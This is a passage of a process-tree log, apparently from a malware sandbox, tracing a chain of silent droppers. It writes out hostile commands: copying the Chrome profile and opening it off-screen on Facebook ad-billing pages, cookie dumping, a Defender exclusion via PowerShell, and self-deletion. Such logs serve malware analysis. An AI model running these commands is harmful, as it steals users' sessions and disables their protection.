C:\Users\Admin\AppData\Local\Temp\is-NBPD6.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-NBPD6.tmp\PictureLAb.tmp" /SL5="$50844,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\PictureLAb.exe" /Verysilent58⤵PID:5740
-
C:\Users\Admin\AppData\Local\Temp\is-EEEJ1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-EEEJ1.tmp\Setup.exe" /VERYSILENT59⤵PID:7336
-
C:\Users\Admin\AppData\Local\Temp\is-SN7MV.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SN7MV.tmp\Setup.tmp" /SL5="$6034A,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-EEEJ1.tmp\Setup.exe" /VERYSILENT60⤵PID:9264
-
C:\Users\Admin\AppData\Local\Temp\is-7MC1O.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-7MC1O.tmp\def.exe" /S /UID=lab21461⤵PID:14088
-
C:\Users\Admin\AppData\Local\Temp\54-63e84-f0b-10db8-acfd97138402d\Mycedivyhy.exe"C:\Users\Admin\AppData\Local\Temp\54-63e84-f0b-10db8-acfd97138402d\Mycedivyhy.exe"62⤵PID:7516
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rtk5opq1.hft\md7_7dfj.exe & exit63⤵PID:13772
-
C:\Users\Admin\AppData\Local\Temp\rtk5opq1.hft\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\rtk5opq1.hft\md7_7dfj.exe64⤵PID:14080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\22uqbh2d.mqh\askinstall18.exe & exit63⤵PID:12884
-
C:\Users\Admin\AppData\Local\Temp\22uqbh2d.mqh\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\22uqbh2d.mqh\askinstall18.exe64⤵PID:8408
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe65⤵PID:9448
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe66⤵
- Kills process with taskkill
PID:13064
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y65⤵PID:11600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/65⤵PID:5420
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2066⤵PID:4500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1944 /prefetch:866⤵PID:3956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1932 /prefetch:866⤵PID:11484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1884 /prefetch:266⤵PID:4592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:166⤵PID:8108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:166⤵PID:14624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:166⤵PID:10720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:166⤵PID:11856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2856 /prefetch:166⤵PID:7012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:166⤵PID:14472
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\txw2edru.mlp\customer4.exe & exit63⤵PID:12332
-
C:\Users\Admin\AppData\Local\Temp\txw2edru.mlp\customer4.exeC:\Users\Admin\AppData\Local\Temp\txw2edru.mlp\customer4.exe64⤵PID:7896
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"65⤵PID:12472
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kmnjuqrb.f34\GcleanerWW.exe /mixone & exit63⤵PID:10956
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2dcae15q.vb0\privacytools5.exe & exit63⤵PID:7868
-
C:\Users\Admin\AppData\Local\Temp\2dcae15q.vb0\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\2dcae15q.vb0\privacytools5.exe64⤵PID:1144
-
C:\Users\Admin\AppData\Local\Temp\2dcae15q.vb0\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\2dcae15q.vb0\privacytools5.exe65⤵PID:11444
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3lk3rrrx.chq\setup.exe /8-2222 & exit63⤵PID:13828
-
C:\Users\Admin\AppData\Local\Temp\3lk3rrrx.chq\setup.exeC:\Users\Admin\AppData\Local\Temp\3lk3rrrx.chq\setup.exe /8-222264⤵PID:12936
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Green-Sound"65⤵PID:12620
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iz3xkszw.bpb\MultitimerFour.exe & exit63⤵PID:11000
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\Delta.exe" /Verysilent57⤵PID:12604
-
C:\Users\Admin\AppData\Local\Temp\is-F8SDD.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-F8SDD.tmp\Delta.tmp" /SL5="$B0710,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\Delta.exe" /Verysilent58⤵PID:11916
-
C:\Users\Admin\AppData\Local\Temp\is-60MJ7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-60MJ7.tmp\Setup.exe" /VERYSILENT59⤵PID:1400
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-60MJ7.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit60⤵PID:13732
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f61⤵
- Kills process with taskkill
PID:13700
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\zznote.exe" /Verysilent57⤵PID:12880
-
C:\Users\Admin\AppData\Local\Temp\is-0BBJ1.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-0BBJ1.tmp\zznote.tmp" /SL5="$C0710,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\zznote.exe" /Verysilent58⤵PID:14044
-
C:\Users\Admin\AppData\Local\Temp\is-JFDFV.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-JFDFV.tmp\jg4_4jaa.exe" /silent59⤵PID:13472
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\hjjgaa.exe" /Verysilent57⤵PID:8004
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt58⤵PID:10812
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt58⤵PID:11152
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zgeanh03lkp\z15edp14lnx.exe"C:\Users\Admin\AppData\Local\Temp\zgeanh03lkp\z15edp14lnx.exe" /ustwo INSTALL53⤵PID:13580
-
-
C:\Users\Admin\AppData\Local\Temp\zcasclwycyl\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\zcasclwycyl\askinstall24.exe"53⤵PID:9480
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe54⤵PID:9736
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe55⤵
- Kills process with taskkill
PID:9332
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y54⤵PID:14240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/54⤵PID:224
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xf0,0xf4,0xf8,0xcc,0xfc,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2055⤵PID:4708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1824 /prefetch:855⤵PID:14340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1560 /prefetch:255⤵PID:5816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2220 /prefetch:855⤵PID:8004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:155⤵PID:1016
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:155⤵PID:13444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:155⤵PID:6976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2976 /prefetch:155⤵PID:11988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:155⤵PID:11500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:155⤵PID:7900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:155⤵PID:11512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:155⤵PID:11048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:155⤵PID:13192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:155⤵PID:12600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:155⤵PID:7560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:155⤵PID:10716
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rwwlzomj105\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\rwwlzomj105\chashepro3.exe" /VERYSILENT53⤵PID:12048
-
C:\Users\Admin\AppData\Local\Temp\is-8UQKK.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-8UQKK.tmp\chashepro3.tmp" /SL5="$D05A4,1478410,58368,C:\Users\Admin\AppData\Local\Temp\rwwlzomj105\chashepro3.exe" /VERYSILENT54⤵PID:15204
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\Delta.exe" /Verysilent42⤵PID:13388
-
C:\Users\Admin\AppData\Local\Temp\is-SQ45M.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-SQ45M.tmp\Delta.tmp" /SL5="$50708,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\Delta.exe" /Verysilent43⤵PID:1052
-
C:\Users\Admin\AppData\Local\Temp\is-IHQ37.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-IHQ37.tmp\Setup.exe" /VERYSILENT44⤵PID:12444
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\zznote.exe" /Verysilent42⤵PID:12756
-
C:\Users\Admin\AppData\Local\Temp\is-2BMG1.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-2BMG1.tmp\zznote.tmp" /SL5="$70676,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\zznote.exe" /Verysilent43⤵PID:12148
-
C:\Users\Admin\AppData\Local\Temp\is-CEI2M.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-CEI2M.tmp\jg4_4jaa.exe" /silent44⤵PID:12000
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\hjjgaa.exe" /Verysilent42⤵PID:14600
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt43⤵PID:13600
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt43⤵PID:9540
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1lcdyb10qam\ja3fs0xkt1y.exe"C:\Users\Admin\AppData\Local\Temp\1lcdyb10qam\ja3fs0xkt1y.exe" /ustwo INSTALL38⤵PID:1068
-
-
C:\Users\Admin\AppData\Local\Temp\ibi5hqoc1vx\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\ibi5hqoc1vx\chashepro3.exe" /VERYSILENT38⤵PID:9536
-
C:\Users\Admin\AppData\Local\Temp\is-5T2TA.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-5T2TA.tmp\chashepro3.tmp" /SL5="$70630,1478410,58368,C:\Users\Admin\AppData\Local\Temp\ibi5hqoc1vx\chashepro3.exe" /VERYSILENT39⤵PID:14996
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\Delta.exe" /Verysilent27⤵PID:11668
-
C:\Users\Admin\AppData\Local\Temp\is-V9C29.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-V9C29.tmp\Delta.tmp" /SL5="$3068A,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\Delta.exe" /Verysilent28⤵PID:12808
-
C:\Users\Admin\AppData\Local\Temp\is-53IRO.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-53IRO.tmp\Setup.exe" /VERYSILENT29⤵PID:13984
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-53IRO.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit30⤵PID:11864
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f31⤵
- Kills process with taskkill
PID:11964
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 631⤵
- Delays execution with timeout.exe
PID:13228
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\zznote.exe" /Verysilent27⤵PID:14040
-
C:\Users\Admin\AppData\Local\Temp\is-GBIF1.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-GBIF1.tmp\zznote.tmp" /SL5="$4068A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\zznote.exe" /Verysilent28⤵PID:14072
-
C:\Users\Admin\AppData\Local\Temp\is-H9C79.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-H9C79.tmp\jg4_4jaa.exe" /silent29⤵PID:15344
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\hjjgaa.exe" /Verysilent27⤵PID:12800
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt28⤵PID:13284
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt28⤵PID:7452
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2nc2w3105lb\na1bwr4hdpx.exe"C:\Users\Admin\AppData\Local\Temp\2nc2w3105lb\na1bwr4hdpx.exe" /ustwo INSTALL23⤵PID:7268
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 65224⤵
- Program crash
PID:7980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 66424⤵
- Program crash
PID:1364
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 66824⤵
- Program crash
PID:7744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 68424⤵
- Program crash
PID:4936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 88824⤵
- Program crash
PID:6692
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 93224⤵
- Program crash
PID:7020
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 119224⤵
- Program crash
PID:8572
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 115624⤵
- Program crash
PID:8744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 130824⤵
- Program crash
PID:8944
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 130024⤵
- Program crash
PID:9100
-
-
-
C:\Users\Admin\AppData\Local\Temp\2u4pfftsl3p\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\2u4pfftsl3p\askinstall24.exe"23⤵PID:7500
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe24⤵PID:7736
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe25⤵
- Kills process with taskkill
PID:3568
-
-
-
